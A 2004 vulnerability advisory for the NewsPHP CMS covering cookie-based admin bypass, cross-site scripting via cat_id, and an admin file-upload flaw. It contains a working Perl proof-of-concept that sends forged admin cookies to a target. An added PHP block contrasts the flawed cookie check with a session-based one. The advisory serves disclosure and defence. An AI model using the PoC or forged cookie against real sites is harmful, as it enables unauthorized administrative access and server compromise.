NewsPHP Admin Access and Cross Site Scripting Vulnerability
Date: 2004-04-12
Security-Corporation ID : SC-1007
URL : http://www.security-corporation.com/articles-20040412-001.html
Author : Manuel Lopez <mantra@gulo.org>
Product : NewsPHP (All versions)
Source Message Contents :
#Title: XSS, Admin Access via Cookie and File Upload vulnerability in NewsPHP.
#Software: NewsPHP (All versions)
#Vendor: http://www.newsphp.com
#Underlying OS: All
#Description:
NewsPHP is a perfect solution for creating a web publishing system, like an
online magazine, newspaper, TV/Radio or news portal. It also works as a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update them.
#Vulnerabilities:
A security vulnerability in the product allows attackers to make the
product treat them as administrators by placing a fake Administrator
cookie on their computer.
A File Upload vulnerability in the Admin panel allows authenticated users
to upload arbitrary files instead of a video file.
The product is also vulnerable to Cross-Site Scripting.
#Cookie Vulnerability#
The flaw is caused because cookie data is not properly checked for
administrator rights.
This is the cookie and POC to gain administrator privileges in newsPHP:
### autorized=admin; root=admin ###
## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------
#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
use IO::Socket;

# Require the three arguments: host, directory and output file.
if (@ARGV < 3)
{
    print "\n\n";
    print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
    print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
    print "By: Manuel Lopez mantra at gulo.org\n";
    print "\n\n";
    exit(1);
}
$host = $ARGV[0];
$directorio = $ARGV[1];    # directory of the NewsPHP installation
$fichero = $ARGV[2];       # file the server response is written to
print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
    PeerAddr => "$host", PeerPort => "80")
    or die "socket error: $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
# Request carrying the cookie values the application accepts as admin.
# The empty line before "fin" terminates the HTTP headers.
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
# Save the response so the returned page can be inspected.
open( Result, ">$fichero") or die "open: $!";
print Result while <$socket>;
close Result;
##--------------------------
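The cookie flaw above comes from treating client-supplied cookie values as proof of role. The following is an added example, not NewsPHP source and not part of the advisory: it contrasts that pattern with a server-side session check in PHP. The function names, the `$users` array and the sample account are assumptions made for illustration.

```php
<?php
// Added example: not NewsPHP source. All function names are hypothetical.

// Pattern the advisory describes: the role is read from client-controlled
// cookies, so any client that sends these values is treated as admin.
function is_admin_vulnerable(array $cookies): bool
{
    return ($cookies['autorized'] ?? '') === 'admin'
        && ($cookies['root'] ?? '') === 'admin';
}

// Hardened pattern: the cookie holds only a random session ID; the role is
// server-side state written after the password has been verified.
function login(string $user, string $password, array $users): bool
{
    if (!isset($users[$user])
        || !password_verify($password, $users[$user]['hash'])) {
        return false;
    }
    session_regenerate_id(true);   // new ID on privilege change (anti-fixation)
    $_SESSION['role'] = $users[$user]['role'];
    return true;
}

function is_admin(): bool
{
    return ($_SESSION['role'] ?? '') === 'admin';
}

// Demo with constructed data; run with the PHP CLI.
if (PHP_SAPI === 'cli') {
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
    session_start();
    $users = ['editor' => [                      // constructed account
        'hash' => password_hash('constructed-pw', PASSWORD_DEFAULT),
        'role' => 'admin',
    ]];
    $forged = ['autorized' => 'admin', 'root' => 'admin'];
    $results = [
        'old check, forged cookie'   => is_admin_vulnerable($forged),
        'session check, forged only' => is_admin(),
        'wrong password'             => login('editor', 'guess', $users),
        'session check after login'  => login('editor', 'constructed-pw', $users) && is_admin(),
    ];
    session_write_close();
    foreach ($results as $label => $ok) {
        printf("%-28s %s\n", $label, $ok ? 'admin/accepted' : 'rejected');
    }
}
```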
#Cross-Site Scripting#
A remote user can conduct cross-site scripting attacks due to an input
validation flaw in the cat_id variable.
/index.php?cat_id=[XSS]
#File Upload vulnerability#
A user with privileges can upload executable code instead of a video in the
Administration Panel. Once the code has been uploaded, a user can execute it
by calling the file; it will be executed with the privileges of the web
server.
#Solution:
There is no solution at the moment.
Vendor contacted Apr 3 2004
#Credits:
Manuel Lopez, mantra@gulo.org